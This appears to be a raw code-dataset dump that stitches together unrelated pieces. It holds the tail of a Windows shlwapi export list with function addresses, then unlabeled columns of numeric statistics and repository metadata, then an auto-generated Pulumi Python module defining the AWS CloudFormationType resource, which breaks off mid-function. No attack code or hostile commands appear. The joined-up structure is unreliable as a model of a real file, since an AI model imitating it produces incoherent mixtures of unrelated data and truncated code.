'0x7ffb3e207fd0'}, {'type': 'function', 'name': 'SHRegOpenUSKeyA', 'address': '0x7ffb3e20f350'}, {'type': 'function', 'name': 'SHRegOpenUSKeyW', 'address': '0x7ffb3e20f370'}, {'type': 'function', 'name': 'SHRegQueryInfoUSKeyA', 'address': '0x7ffb3e20f390'}, {'type': 'function', 'name': 'SHRegQueryInfoUSKeyW', 'address': '0x7ffb3e20f3b0'}, {'type': 'function', 'name': 'SHRegQueryUSValueA', 'address': '0x7ffb3e20f3d0'}, {'type': 'function', 'name': 'SHRegQueryUSValueW', 'address': '0x7ffb3e20f3f0'}, {'type': 'function', 'name': 'SHRegSetPathA', 'address': '0x7ffb3e2125a0'}, {'type': 'function', 'name': 'SHRegSetPathW', 'address': '0x7ffb3e2125c0'}, {'type': 'function', 'name': 'SHRegSetUSValueA', 'address': '0x7ffb3e20f410'}, {'type': 'function', 'name': 'SHRegSetUSValueW', 'address': '0x7ffb3e20f430'}, {'type': 'function', 'name': 'SHRegWriteUSValueA', 'address': '0x7ffb3e20f450'}, {'type': 'function', 'name': 'SHRegWriteUSValueW', 'address': '0x7ffb3e20f470'}, {'type': 'function', 'name': 'SHRegisterValidateTemplate', 'address': '0x7ffb3e22b260'}, {'type': 'function', 'name': 'SHReleaseThreadRef', 'address': '0x7ffb3e2125e0'}, {'type': 'function', 'name': 'SHRunIndirectRegClientCommand', 'address': '0x7ffb3e217570'}, {'type': 'function', 'name': 'SHSendMessageBroadcastA', 'address': '0x7ffb3e21d670'}, {'type': 'function', 'name': 'SHSendMessageBroadcastW', 'address': '0x7ffb3e21d6a0'}, {'type': 'function', 'name': 'SHSetThreadRef', 'address': '0x7ffb3e209eb0'}, {'type': 'function', 'name': 'SHSetValueA', 'address': '0x7ffb3e212600'}, {'type': 'function', 'name': 'SHSetValueW', 'address': '0x7ffb3e209da0'}, {'type': 'function', 'name': 'SHSkipJunction', 'address': '0x7ffb3e205ff0'}, {'type': 'function', 'name': 'SHStrDupA', 'address': '0x7ffb3e212620'}, {'type': 'function', 'name': 'SHStrDupW', 'address': '0x7ffb3e209e90'}, {'type': 'function', 'name': 'SHStripMneumonicA', 'address': '0x7ffb3e21d8e0'}, {'type': 'function', 'name': 'SHStripMneumonicW', 'address': '0x7ffb3e206a90'}, {'type': 'function', 'name': 'SHUnicodeToAnsi', 'address': '0x7ffb3e212640'}, {'type': 'function', 'name': 'SHUnicodeToUnicode', 'address': '0x7ffb3e212660'}, {'type': 'function', 'name': 'SHUnlockShared', 'address': '0x7ffb3e2206c0'}, {'type': 'function', 'name': 'ShellMessageBoxA', 'address': '0x7ffb3e214f80'}, {'type': 'function', 'name': 'ShellMessageBoxW', 'address': '0x7ffb3e219410'}, {'type': 'function', 'name': 'StrCSpnA', 'address': '0x7ffb3e20f4b0'}, {'type': 'function', 'name': 'StrCSpnIA', 'address': '0x7ffb3e20f4d0'}, {'type': 'function', 'name': 'StrCSpnIW', 'address': '0x7ffb3e20f4f0'}, {'type': 'function', 'name': 'StrCSpnW', 'address': '0x7ffb3e20f510'}, {'type': 'function', 'name': 'StrCatBuffA', 'address': '0x7ffb3e20f530'}, {'type': 'function', 'name': 'StrCatBuffW', 'address': '0x7ffb3e20f550'}, {'type': 'function', 'name': 'StrCatChainW', 'address': '0x7ffb3e20f570'}, {'type': 'function', 'name': 'StrCatW', 'address': '0x7ffb3e219880'}, {'type': 'function', 'name': 'StrChrA', 'address': '0x7ffb3e20f590'}, {'type': 'function', 'name': 'StrChrIA', 'address': '0x7ffb3e20f5b0'}, {'type': 'function', 'name': 'StrChrIW', 'address': '0x7ffb3e207fb0'}, {'type': 'function', 'name': 'StrChrNIW', 'address': '0x7ffb3e20f5d0'}, {'type': 'function', 'name': 'StrChrNW', 'address': '0x7ffb3e20f5f0'}, {'type': 'function', 'name': 'StrChrW', 'address': '0x7ffb3e2062a0'}, {'type': 'function', 'name': 'StrCmpCA', 'address': '0x7ffb3e20f610'}, {'type': 'function', 'name': 'StrCmpCW', 'address': '0x7ffb3e206fc0'}, {'type': 'function', 'name': 'StrCmpICA', 'address': '0x7ffb3e207870'}, {'type': 'function', 'name': 'StrCmpICW', 'address': '0x7ffb3e206e30'}, {'type': 'function', 'name': 'StrCmpIW', 'address': '0x7ffb3e2019b0'}, {'type': 'function', 'name': 'StrCmpLogicalW', 'address': '0x7ffb3e20f630'}, {'type': 'function', 'name': 'StrCmpNA', 'address': '0x7ffb3e20f650'}, {'type': 'function', 'name': 'StrCmpNCA', 'address': '0x7ffb3e20f670'}, {'type': 'function', 'name': 'StrCmpNCW', 'address': '0x7ffb3e20f690'}, {'type': 'function', 'name': 'StrCmpNIA', 'address': '0x7ffb3e20f6b0'}, {'type': 'function', 'name': 'StrCmpNICA', 'address': '0x7ffb3e20f6d0'}, {'type': 'function', 'name': 'StrCmpNICW', 'address': '0x7ffb3e208030'}, {'type': 'function', 'name': 'StrCmpNIW', 'address': '0x7ffb3e209570'}, {'type': 'function', 'name': 'StrCmpNW', 'address': '0x7ffb3e2066a0'}, {'type': 'function', 'name': 'StrCmpW', 'address': '0x7ffb3e205860'}, {'type': 'function', 'name': 'StrCpyNW', 'address': '0x7ffb3e20f6f0'}, {'type': 'function', 'name': 'StrCpyW', 'address': '0x7ffb3e2198c0'}, {'type': 'function', 'name': 'StrDupA', 'address': '0x7ffb3e20f750'}, {'type': 'function', 'name': 'StrDupW', 'address': '0x7ffb3e2070f0'}, {'type': 'function', 'name': 'StrFormatByteSize64A', 'address': '0x7ffb3e219990'}, {'type': 'function', 'name': 'StrFormatByteSizeA', 'address': '0x7ffb3e219a10'}, {'type': 'function', 'name': 'StrFormatByteSizeEx', 'address': '0x7ffb3e201870'}, {'type': 'function', 'name': 'StrFormatByteSizeW', 'address': '0x7ffb3e219a20'}, {'type': 'function', 'name': 'StrFormatKBSizeA', 'address': '0x7ffb3e219a40'}, {'type': 'function', 'name': 'StrFormatKBSizeW', 'address': '0x7ffb3e219ac0'}, {'type': 'function', 'name': 'StrFromTimeIntervalA', 'address': '0x7ffb3e219ef0'}, {'type': 'function', 'name': 'StrFromTimeIntervalW', 'address': '0x7ffb3e219f80'}, {'type': 'function', 'name': 'StrIsIntlEqualA', 'address': '0x7ffb3e20f770'}, {'type': 'function', 'name': 'StrIsIntlEqualW', 'address': '0x7ffb3e20f790'}, {'type': 'function', 'name': 'StrNCatA', 'address': '0x7ffb3e2198f0'}, {'type': 'function', 'name': 'StrNCatW', 'address': '0x7ffb3e219940'}, {'type': 'function', 'name': 'StrPBrkA', 'address': '0x7ffb3e20f7b0'}, {'type': 'function', 'name': 'StrPBrkW', 'address': '0x7ffb3e209700'}, {'type': 'function', 'name': 'StrRChrA', 'address': '0x7ffb3e20f7d0'}, {'type': 'function', 'name': 'StrRChrIA', 'address': '0x7ffb3e20f7f0'}, {'type': 'function', 'name': 'StrRChrIW', 'address': '0x7ffb3e2090c0'}, {'type': 'function', 'name': 'StrRChrW', 'address': '0x7ffb3e209370'}, {'type': 'function', 'name': 'StrRStrIA', 'address': '0x7ffb3e20f810'}, {'type': 'function', 'name': 'StrRStrIW', 'address': '0x7ffb3e20f830'}, {'type': 'function', 'name': 'StrRetToBSTR', 'address': '0x7ffb3e219ae0'}, {'type': 'function', 'name': 'StrRetToBufA', 'address': '0x7ffb3e219b00'}, {'type': 'function', 'name': 'StrRetToBufW', 'address': '0x7ffb3e207f60'}, {'type': 'function', 'name': 'StrRetToStrA', 'address': '0x7ffb3e219bc0'}, {'type': 'function', 'name': 'StrRetToStrW', 'address': '0x7ffb3e219c50'}, {'type': 'function', 'name': 'StrSpnA', 'address': '0x7ffb3e20f850'}, {'type': 'function', 'name': 'StrSpnW', 'address': '0x7ffb3e20f870'}, {'type': 'function', 'name': 'StrStrA', 'address': '0x7ffb3e20f890'}, {'type': 'function', 'name': 'StrStrIA', 'address': '0x7ffb3e20f8b0'}, {'type': 'function', 'name': 'StrStrIW', 'address': '0x7ffb3e206a50'}, {'type': 'function', 'name': 'StrStrNIW', 'address': '0x7ffb3e20f8d0'}, {'type': 'function', 'name': 'StrStrNW', 'address': '0x7ffb3e20f8f0'}, {'type': 'function', 'name': 'StrStrW', 'address': '0x7ffb3e20f910'}, {'type': 'function', 'name': 'StrToInt64ExA', 'address': '0x7ffb3e20f930'}, {'type': 'function', 'name': 'StrToInt64ExW', 'address': '0x7ffb3e20f950'}, {'type': 'function', 'name': 'StrToIntA', 'address': '0x7ffb3e20f970'}, {'type': 'function', 'name': 'StrToIntExA', 'address': '0x7ffb3e20f990'}, {'type': 'function', 'name': 'StrToIntExW', 'address': '0x7ffb3e2096e0'}, {'type': 'function', 'name': 'StrToIntW', 'address': '0x7ffb3e206280'}, {'type': 'function', 'name': 'StrTrimA', 'address': '0x7ffb3e20f9b0'}, {'type': 'function', 'name': 'StrTrimW', 'address': '0x7ffb3e2099b0'}, {'type': 'function', 'name': 'UrlApplySchemeA', 'address': '0x7ffb3e20f9d0'}, {'type': 'function', 'name': 'UrlApplySchemeW', 'address': '0x7ffb3e20f9f0'}, {'type': 'function', 'name': 'UrlCanonicalizeA', 'address': '0x7ffb3e20fa10'}, {'type': 'function', 'name': 'UrlCanonicalizeW', 'address': '0x7ffb3e207600'}, {'type': 'function', 'name': 'UrlCombineA', 'address': '0x7ffb3e20fa30'}, {'type': 'function', 'name': 'UrlCombineW', 'address': '0x7ffb3e207a60'}, {'type': 'function', 'name': 'UrlCompareA', 'address': '0x7ffb3e20fa50'}, {'type': 'function', 'name': 'UrlCompareW', 'address': '0x7ffb3e20fa70'}, {'type': 'function', 'name': 'UrlCreateFromPathA', 'address': '0x7ffb3e20fa90'}, {'type': 'function', 'name': 'UrlCreateFromPathW', 'address': '0x7ffb3e20fab0'}, {'type': 'function', 'name': 'UrlEscapeA', 'address': '0x7ffb3e20fad0'}, {'type': 'function', 'name': 'UrlEscapeW', 'address': '0x7ffb3e207970'}, {'type': 'function', 'name': 'UrlFixupW', 'address': '0x7ffb3e20faf0'}, {'type': 'function', 'name': 'UrlGetLocationA', 'address': '0x7ffb3e20fb10'}, {'type': 'function', 'name': 'UrlGetLocationW', 'address': '0x7ffb3e20fb30'}, {'type': 'function', 'name': 'UrlGetPartA', 'address': '0x7ffb3e20fb50'}, {'type': 'function', 'name': 'UrlGetPartW', 'address': '0x7ffb3e206a70'}, {'type': 'function', 'name': 'UrlHashA', 'address': '0x7ffb3e20fb70'}, {'type': 'function', 'name': 'UrlHashW', 'address': '0x7ffb3e20fb90'}, {'type': 'function', 'name': 'UrlIsA', 'address': '0x7ffb3e20fbb0'}, {'type': 'function', 'name': 'UrlIsNoHistoryA', 'address': '0x7ffb3e20fbd0'}, {'type': 'function', 'name': 'UrlIsNoHistoryW', 'address': '0x7ffb3e208130'}, {'type': 'function', 'name': 'UrlIsOpaqueA', 'address': '0x7ffb3e20fbf0'}, {'type': 'function', 'name': 'UrlIsOpaqueW', 'address': '0x7ffb3e20fc10'}, {'type': 'function', 'name': 'UrlIsW', 'address': '0x7ffb3e206c30'}, {'type': 'function', 'name': 'UrlUnescapeA', 'address': '0x7ffb3e20fc30'}, {'type': 'function', 'name': 'UrlUnescapeW', 'address': '0x7ffb3e207280'}, {'type': 'function', 'name': 'WhichPlatform', 'address': '0x7ffb3e21da20'}, {'type': 'function', 'name': 'wnsprintfA', 'address': '0x7ffb3e21a900'}, {'type': 'function', 'name': 'wnsprintfW', 'address': '0x7ffb3e21a950'}, {'type': 'function', 'name': 'wvnsprintfA', 'address': '0x7ffb3e21a9b0'}, {'type': 'function', 'name': 'wvnsprintfW', 'address': '0x7ffb3e21a9f0'}]
| 14,561.5
| 29,110
| 0.665797
| 2,265
| 29,123
| 8.552318
| 0.333333
| 0.231687
| 0.308915
| 0.010686
| 0.00764
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108874
| 0.07719
| 29,123
| 2
| 29,110
| 14,561.5
| 0.611907
| 0
| 0
| 0
| 0
| 0
| 0.665293
| 0.031314
| 0
| 0
| 0.179783
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
6ad96ee0742eb74d9fad999e7d37a0127ae1d073
| 36,072
|
py
|
Python
|
sdk/python/pulumi_aws/cloudformation/cloud_formation_type.py
|
dmelo/pulumi-aws
|
dd1a08d1fb93bab0d046aa410ca660f05ca0a58c
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/cloudformation/cloud_formation_type.py
|
dmelo/pulumi-aws
|
dd1a08d1fb93bab0d046aa410ca660f05ca0a58c
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/cloudformation/cloud_formation_type.py
|
dmelo/pulumi-aws
|
dd1a08d1fb93bab0d046aa410ca660f05ca0a58c
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['CloudFormationTypeArgs', 'CloudFormationType']
@pulumi.input_type
class CloudFormationTypeArgs:
def __init__(__self__, *,
schema_handler_package: pulumi.Input[str],
type_name: pulumi.Input[str],
execution_role_arn: Optional[pulumi.Input[str]] = None,
logging_config: Optional[pulumi.Input['CloudFormationTypeLoggingConfigArgs']] = None,
type: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a CloudFormationType resource.
:param pulumi.Input[str] schema_handler_package: URL to the S3 bucket containing the extension project package that contains the necessary files for the extension you want to register. Must begin with `s3://` or `https://`. For example, `s3://example-bucket/example-object`.
:param pulumi.Input[str] type_name: CloudFormation Type name. For example, `ExampleCompany::ExampleService::ExampleResource`.
:param pulumi.Input[str] execution_role_arn: Amazon Resource Name (ARN) of the IAM Role for CloudFormation to assume when invoking the extension. If your extension calls AWS APIs in any of its handlers, you must create an IAM execution role that includes the necessary permissions to call those AWS APIs, and provision that execution role in your account. When CloudFormation needs to invoke the extension handler, CloudFormation assumes this execution role to create a temporary session token, which it then passes to the extension handler, thereby supplying your extension with the appropriate credentials.
:param pulumi.Input['CloudFormationTypeLoggingConfigArgs'] logging_config: Configuration block containing logging configuration.
:param pulumi.Input[str] type: CloudFormation Registry Type. For example, `RESOURCE` or `MODULE`.
"""
pulumi.set(__self__, "schema_handler_package", schema_handler_package)
pulumi.set(__self__, "type_name", type_name)
if execution_role_arn is not None:
pulumi.set(__self__, "execution_role_arn", execution_role_arn)
if logging_config is not None:
pulumi.set(__self__, "logging_config", logging_config)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="schemaHandlerPackage")
def schema_handler_package(self) -> pulumi.Input[str]:
"""
URL to the S3 bucket containing the extension project package that contains the necessary files for the extension you want to register. Must begin with `s3://` or `https://`. For example, `s3://example-bucket/example-object`.
"""
return pulumi.get(self, "schema_handler_package")
@schema_handler_package.setter
def schema_handler_package(self, value: pulumi.Input[str]):
pulumi.set(self, "schema_handler_package", value)
@property
@pulumi.getter(name="typeName")
def type_name(self) -> pulumi.Input[str]:
"""
CloudFormation Type name. For example, `ExampleCompany::ExampleService::ExampleResource`.
"""
return pulumi.get(self, "type_name")
@type_name.setter
def type_name(self, value: pulumi.Input[str]):
pulumi.set(self, "type_name", value)
@property
@pulumi.getter(name="executionRoleArn")
def execution_role_arn(self) -> Optional[pulumi.Input[str]]:
"""
Amazon Resource Name (ARN) of the IAM Role for CloudFormation to assume when invoking the extension. If your extension calls AWS APIs in any of its handlers, you must create an IAM execution role that includes the necessary permissions to call those AWS APIs, and provision that execution role in your account. When CloudFormation needs to invoke the extension handler, CloudFormation assumes this execution role to create a temporary session token, which it then passes to the extension handler, thereby supplying your extension with the appropriate credentials.
"""
return pulumi.get(self, "execution_role_arn")
@execution_role_arn.setter
def execution_role_arn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "execution_role_arn", value)
@property
@pulumi.getter(name="loggingConfig")
def logging_config(self) -> Optional[pulumi.Input['CloudFormationTypeLoggingConfigArgs']]:
"""
Configuration block containing logging configuration.
"""
return pulumi.get(self, "logging_config")
@logging_config.setter
def logging_config(self, value: Optional[pulumi.Input['CloudFormationTypeLoggingConfigArgs']]):
pulumi.set(self, "logging_config", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
"""
CloudFormation Registry Type. For example, `RESOURCE` or `MODULE`.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@pulumi.input_type
class _CloudFormationTypeState:
def __init__(__self__, *,
arn: Optional[pulumi.Input[str]] = None,
default_version_id: Optional[pulumi.Input[str]] = None,
deprecated_status: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
documentation_url: Optional[pulumi.Input[str]] = None,
execution_role_arn: Optional[pulumi.Input[str]] = None,
is_default_version: Optional[pulumi.Input[bool]] = None,
logging_config: Optional[pulumi.Input['CloudFormationTypeLoggingConfigArgs']] = None,
provisioning_type: Optional[pulumi.Input[str]] = None,
schema: Optional[pulumi.Input[str]] = None,
schema_handler_package: Optional[pulumi.Input[str]] = None,
source_url: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None,
type_arn: Optional[pulumi.Input[str]] = None,
type_name: Optional[pulumi.Input[str]] = None,
version_id: Optional[pulumi.Input[str]] = None,
visibility: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering CloudFormationType resources.
:param pulumi.Input[str] arn: (Optional) Amazon Resource Name (ARN) of the CloudFormation Type version. See also `type_arn`.
:param pulumi.Input[str] default_version_id: Identifier of the CloudFormation Type default version.
:param pulumi.Input[str] deprecated_status: Deprecation status of the version.
:param pulumi.Input[str] description: Description of the version.
:param pulumi.Input[str] documentation_url: URL of the documentation for the CloudFormation Type.
:param pulumi.Input[str] execution_role_arn: Amazon Resource Name (ARN) of the IAM Role for CloudFormation to assume when invoking the extension. If your extension calls AWS APIs in any of its handlers, you must create an IAM execution role that includes the necessary permissions to call those AWS APIs, and provision that execution role in your account. When CloudFormation needs to invoke the extension handler, CloudFormation assumes this execution role to create a temporary session token, which it then passes to the extension handler, thereby supplying your extension with the appropriate credentials.
:param pulumi.Input[bool] is_default_version: Whether the CloudFormation Type version is the default version.
:param pulumi.Input['CloudFormationTypeLoggingConfigArgs'] logging_config: Configuration block containing logging configuration.
:param pulumi.Input[str] provisioning_type: Provisioning behavior of the CloudFormation Type.
:param pulumi.Input[str] schema: JSON document of the CloudFormation Type schema.
:param pulumi.Input[str] schema_handler_package: URL to the S3 bucket containing the extension project package that contains the necessary files for the extension you want to register. Must begin with `s3://` or `https://`. For example, `s3://example-bucket/example-object`.
:param pulumi.Input[str] source_url: URL of the source code for the CloudFormation Type.
:param pulumi.Input[str] type: CloudFormation Registry Type. For example, `RESOURCE` or `MODULE`.
:param pulumi.Input[str] type_arn: (Optional) Amazon Resource Name (ARN) of the CloudFormation Type. See also `arn`.
:param pulumi.Input[str] type_name: CloudFormation Type name. For example, `ExampleCompany::ExampleService::ExampleResource`.
:param pulumi.Input[str] version_id: (Optional) Identifier of the CloudFormation Type version.
:param pulumi.Input[str] visibility: Scope of the CloudFormation Type.
"""
if arn is not None:
pulumi.set(__self__, "arn", arn)
if default_version_id is not None:
pulumi.set(__self__, "default_version_id", default_version_id)
if deprecated_status is not None:
pulumi.set(__self__, "deprecated_status", deprecated_status)
if description is not None:
pulumi.set(__self__, "description", description)
if documentation_url is not None:
pulumi.set(__self__, "documentation_url", documentation_url)
if execution_role_arn is not None:
pulumi.set(__self__, "execution_role_arn", execution_role_arn)
if is_default_version is not None:
pulumi.set(__self__, "is_default_version", is_default_version)
if logging_config is not None:
pulumi.set(__self__, "logging_config", logging_config)
if provisioning_type is not None:
pulumi.set(__self__, "provisioning_type", provisioning_type)
if schema is not None:
pulumi.set(__self__, "schema", schema)
if schema_handler_package is not None:
pulumi.set(__self__, "schema_handler_package", schema_handler_package)
if source_url is not None:
pulumi.set(__self__, "source_url", source_url)
if type is not None:
pulumi.set(__self__, "type", type)
if type_arn is not None:
pulumi.set(__self__, "type_arn", type_arn)
if type_name is not None:
pulumi.set(__self__, "type_name", type_name)
if version_id is not None:
pulumi.set(__self__, "version_id", version_id)
if visibility is not None:
pulumi.set(__self__, "visibility", visibility)
@property
@pulumi.getter
def arn(self) -> Optional[pulumi.Input[str]]:
"""
(Optional) Amazon Resource Name (ARN) of the CloudFormation Type version. See also `type_arn`.
"""
return pulumi.get(self, "arn")
@arn.setter
def arn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "arn", value)
@property
@pulumi.getter(name="defaultVersionId")
def default_version_id(self) -> Optional[pulumi.Input[str]]:
"""
Identifier of the CloudFormation Type default version.
"""
return pulumi.get(self, "default_version_id")
@default_version_id.setter
def default_version_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "default_version_id", value)
@property
@pulumi.getter(name="deprecatedStatus")
def deprecated_status(self) -> Optional[pulumi.Input[str]]:
"""
Deprecation status of the version.
"""
return pulumi.get(self, "deprecated_status")
@deprecated_status.setter
def deprecated_status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "deprecated_status", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Description of the version.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="documentationUrl")
def documentation_url(self) -> Optional[pulumi.Input[str]]:
"""
URL of the documentation for the CloudFormation Type.
"""
return pulumi.get(self, "documentation_url")
@documentation_url.setter
def documentation_url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "documentation_url", value)
@property
@pulumi.getter(name="executionRoleArn")
def execution_role_arn(self) -> Optional[pulumi.Input[str]]:
"""
Amazon Resource Name (ARN) of the IAM Role for CloudFormation to assume when invoking the extension. If your extension calls AWS APIs in any of its handlers, you must create an IAM execution role that includes the necessary permissions to call those AWS APIs, and provision that execution role in your account. When CloudFormation needs to invoke the extension handler, CloudFormation assumes this execution role to create a temporary session token, which it then passes to the extension handler, thereby supplying your extension with the appropriate credentials.
"""
return pulumi.get(self, "execution_role_arn")
@execution_role_arn.setter
def execution_role_arn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "execution_role_arn", value)
@property
@pulumi.getter(name="isDefaultVersion")
def is_default_version(self) -> Optional[pulumi.Input[bool]]:
"""
Whether the CloudFormation Type version is the default version.
"""
return pulumi.get(self, "is_default_version")
@is_default_version.setter
def is_default_version(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_default_version", value)
@property
@pulumi.getter(name="loggingConfig")
def logging_config(self) -> Optional[pulumi.Input['CloudFormationTypeLoggingConfigArgs']]:
"""
Configuration block containing logging configuration.
"""
return pulumi.get(self, "logging_config")
@logging_config.setter
def logging_config(self, value: Optional[pulumi.Input['CloudFormationTypeLoggingConfigArgs']]):
pulumi.set(self, "logging_config", value)
@property
@pulumi.getter(name="provisioningType")
def provisioning_type(self) -> Optional[pulumi.Input[str]]:
"""
Provisioning behavior of the CloudFormation Type.
"""
return pulumi.get(self, "provisioning_type")
@provisioning_type.setter
def provisioning_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "provisioning_type", value)
@property
@pulumi.getter
def schema(self) -> Optional[pulumi.Input[str]]:
"""
JSON document of the CloudFormation Type schema.
"""
return pulumi.get(self, "schema")
@schema.setter
def schema(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "schema", value)
@property
@pulumi.getter(name="schemaHandlerPackage")
def schema_handler_package(self) -> Optional[pulumi.Input[str]]:
"""
URL to the S3 bucket containing the extension project package that contains the necessary files for the extension you want to register. Must begin with `s3://` or `https://`. For example, `s3://example-bucket/example-object`.
"""
return pulumi.get(self, "schema_handler_package")
@schema_handler_package.setter
def schema_handler_package(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "schema_handler_package", value)
@property
@pulumi.getter(name="sourceUrl")
def source_url(self) -> Optional[pulumi.Input[str]]:
"""
URL of the source code for the CloudFormation Type.
"""
return pulumi.get(self, "source_url")
@source_url.setter
def source_url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source_url", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
"""
CloudFormation Registry Type. For example, `RESOURCE` or `MODULE`.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="typeArn")
def type_arn(self) -> Optional[pulumi.Input[str]]:
"""
(Optional) Amazon Resource Name (ARN) of the CloudFormation Type. See also `arn`.
"""
return pulumi.get(self, "type_arn")
@type_arn.setter
def type_arn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type_arn", value)
@property
@pulumi.getter(name="typeName")
def type_name(self) -> Optional[pulumi.Input[str]]:
"""
CloudFormation Type name. For example, `ExampleCompany::ExampleService::ExampleResource`.
"""
return pulumi.get(self, "type_name")
@type_name.setter
def type_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type_name", value)
@property
@pulumi.getter(name="versionId")
def version_id(self) -> Optional[pulumi.Input[str]]:
"""
(Optional) Identifier of the CloudFormation Type version.
"""
return pulumi.get(self, "version_id")
@version_id.setter
def version_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "version_id", value)
@property
@pulumi.getter
def visibility(self) -> Optional[pulumi.Input[str]]:
"""
Scope of the CloudFormation Type.
"""
return pulumi.get(self, "visibility")
@visibility.setter
def visibility(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "visibility", value)
class CloudFormationType(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
execution_role_arn: Optional[pulumi.Input[str]] = None,
logging_config: Optional[pulumi.Input[pulumi.InputType['CloudFormationTypeLoggingConfigArgs']]] = None,
schema_handler_package: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None,
type_name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
## Example Usage
```python
import pulumi
import pulumi_aws as aws
example = aws.cloudformation.CloudFormationType("example",
schema_handler_package=f"s3://{aws_s3_bucket_object['example']['bucket']}/{aws_s3_bucket_object['example']['key']}",
type="RESOURCE",
type_name="ExampleCompany::ExampleService::ExampleResource",
logging_config=aws.cloudformation.CloudFormationTypeLoggingConfigArgs(
log_group_name=aws_cloudwatch_log_group["example"]["name"],
log_role_arn=aws_iam_role["example"]["arn"],
))
```
## Import
`aws_cloudformation_type` can be imported with their type version Amazon Resource Name (ARN), e.g.,
```sh
$ pulumi import aws:cloudformation/cloudFormationType:CloudFormationType example arn:aws:cloudformation:us-east-1:123456789012:type/resource/ExampleCompany-ExampleService-ExampleType/1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] execution_role_arn: Amazon Resource Name (ARN) of the IAM Role for CloudFormation to assume when invoking the extension. If your extension calls AWS APIs in any of its handlers, you must create an IAM execution role that includes the necessary permissions to call those AWS APIs, and provision that execution role in your account. When CloudFormation needs to invoke the extension handler, CloudFormation assumes this execution role to create a temporary session token, which it then passes to the extension handler, thereby supplying your extension with the appropriate credentials.
:param pulumi.Input[pulumi.InputType['CloudFormationTypeLoggingConfigArgs']] logging_config: Configuration block containing logging configuration.
:param pulumi.Input[str] schema_handler_package: URL to the S3 bucket containing the extension project package that contains the necessary files for the extension you want to register. Must begin with `s3://` or `https://`. For example, `s3://example-bucket/example-object`.
:param pulumi.Input[str] type: CloudFormation Registry Type. For example, `RESOURCE` or `MODULE`.
:param pulumi.Input[str] type_name: CloudFormation Type name. For example, `ExampleCompany::ExampleService::ExampleResource`.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: CloudFormationTypeArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
## Example Usage
```python
import pulumi
import pulumi_aws as aws
example = aws.cloudformation.CloudFormationType("example",
schema_handler_package=f"s3://{aws_s3_bucket_object['example']['bucket']}/{aws_s3_bucket_object['example']['key']}",
type="RESOURCE",
type_name="ExampleCompany::ExampleService::ExampleResource",
logging_config=aws.cloudformation.CloudFormationTypeLoggingConfigArgs(
log_group_name=aws_cloudwatch_log_group["example"]["name"],
log_role_arn=aws_iam_role["example"]["arn"],
))
```
## Import
`aws_cloudformation_type` can be imported with their type version Amazon Resource Name (ARN), e.g.,
```sh
$ pulumi import aws:cloudformation/cloudFormationType:CloudFormationType example arn:aws:cloudformation:us-east-1:123456789012:type/resource/ExampleCompany-ExampleService-ExampleType/1
```
:param str resource_name: The name of the resource.
:param CloudFormationTypeArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(CloudFormationTypeArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
